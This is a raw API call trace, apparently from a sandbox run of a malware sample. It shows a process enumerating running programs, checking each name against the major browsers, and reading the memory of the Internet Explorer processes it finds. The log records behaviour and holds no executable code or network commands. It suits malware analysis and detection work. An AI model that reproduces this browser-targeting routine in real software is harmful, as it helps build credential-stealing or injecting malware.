	[0243.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.556] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0243.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8cac
	[0243.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.557] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.557] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.558] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.558] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0243.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8cb0
	[0243.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.559] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0243.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.559] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.560] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0243.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.560] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0243.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0243.561] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0243.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8cb4
	[0243.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.562] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0243.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.563] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.564] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0243.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.565] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0243.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8cb8
	[0243.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.567] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0243.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.567] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.567] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0243.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.568] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.568] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0243.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8cbc
	[0243.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.569] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0243.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.569] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.569] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0243.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.570] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.570] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0243.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8cc0
	[0243.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.571] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0243.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.571] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.572] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0243.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.572] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0243.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8cc4
	[0243.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.573] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0243.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.574] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.574] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0243.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.575] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0243.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8cc8
	[0243.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.576] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0243.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.576] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.577] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0243.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.577] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.577] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0243.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8ccc
	[0243.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.578] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0243.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.578] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.580] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0243.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.581] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0243.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8cd0
	[0243.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.582] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0243.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.582] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.583] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0243.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.583] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0243.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8cd4
	[0243.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.585] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0243.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.585] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.585] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0243.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.585] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.585] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0243.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8cd8
	[0243.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.586] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0243.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.587] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.587] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0243.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.587] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.587] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0243.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8cdc
	[0243.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.588] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0243.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.589] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.589] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0243.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.590] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.590] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0243.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8ce0
	[0243.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.591] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0243.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.591] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.592] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0243.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.593] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0243.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8ce4
	[0243.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.594] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0243.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.594] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0243.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0243.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8ce8
	[0243.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.597] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0243.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.598] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.599] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0243.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.599] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.600] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0243.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8cec
	[0243.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.601] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0243.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.601] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.602] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0243.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.602] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8cf0
	[0243.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.603] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.604] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.604] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.604] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.604] NtQueryInformationProcess (in: ProcessHandle=0x8cf0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.605] ReadProcessMemory (in: hProcess=0x8cf0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.605] ReadProcessMemory (in: hProcess=0x8cf0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.605] ReadProcessMemory (in: hProcess=0x8cf0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.605] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8cf4
	[0243.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.606] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.606] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.607] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.607] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.607] NtQueryInformationProcess (in: ProcessHandle=0x8cf4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.607] ReadProcessMemory (in: hProcess=0x8cf4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.607] ReadProcessMemory (in: hProcess=0x8cf4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.608] ReadProcessMemory (in: hProcess=0x8cf4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.608] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.608] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8cf8
	[0243.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.609] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.609] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.609] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.610] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0243.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8cfc
	[0243.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.611] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0243.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.612] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.612] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0243.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.613] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.613] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8d00
	[0243.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.614] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.614] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.615] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.615] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
